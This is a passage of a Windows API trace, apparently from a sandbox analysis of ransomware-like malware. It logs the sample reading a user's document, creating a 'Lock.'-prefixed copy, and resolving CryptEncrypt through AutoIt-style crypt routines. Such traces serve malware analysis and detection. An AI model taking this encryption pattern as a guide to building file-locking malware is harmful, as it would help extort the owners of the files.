dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0268.434] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0268.434] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0268.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0268.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0268.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0268.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0268.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0268.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0268.435] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0268.435] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0268.435] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0268.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0268.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0268.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0268.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0268.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0268.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0268.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0268.435] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0268.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0268.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0268.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0268.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0268.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0268.436] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.ypyYdQHgVdPHUEe.odt" (normalized: "c:\\users\\fd1hvy\\documents\\lock.ypyydqhgvdphuee.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0268.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0268.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0268.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0268.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0268.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0268.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.437] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0268.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0268.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0268.437] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0268.437] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0268.438] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0268.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0268.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0268.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0268.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0268.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0268.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0268.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0268.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0268.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0268.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1250020 [0268.441] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0268.442] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0268.445] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x19ea, lpOverlapped=0x0) returned 1 [0268.445] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0268.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0268.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0268.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0268.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119ea) returned 0x2f16018 [0268.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1250020 | out: hHeap=0x970000) returned 1 [0268.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0268.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0268.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0268.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0268.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119ea) returned 0x2f27a10 [0268.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0268.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.451] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0268.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0268.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0268.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0268.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0268.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119ea) returned 0x2f16018 [0268.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0268.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0268.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0268.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0268.462] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0268.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0268.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0268.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0268.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0268.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0268.462] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0268.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0268.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0268.462] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0268.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0268.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0268.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d88 [0268.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0268.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119ea) returned 0x2f16018 [0268.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55068 [0268.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0268.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54fb8 [0268.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0268.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0268.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f58 [0268.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0268.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0268.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0268.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0268.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0268.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0268.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119ea) returned 0x2f39408 [0268.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0268.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0268.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0268.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0268.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0268.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0268.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0268.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0268.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0268.468] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.468] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.468] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.468] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.468] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.469] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.469] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0268.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0268.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.469] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.469] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.469] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0268.469] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0268.469] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.469] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0268.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0268.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.470] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.470] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0268.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.470] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.470] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.470] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.470] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0268.470] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.470] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.470] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0268.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51e80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0268.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0268.472] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0268.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0268.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54148 [0268.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0268.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0268.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0268.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0268.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0268.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0268.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0268.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0268.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0268.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0268.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0268.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0268.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0268.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0268.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: 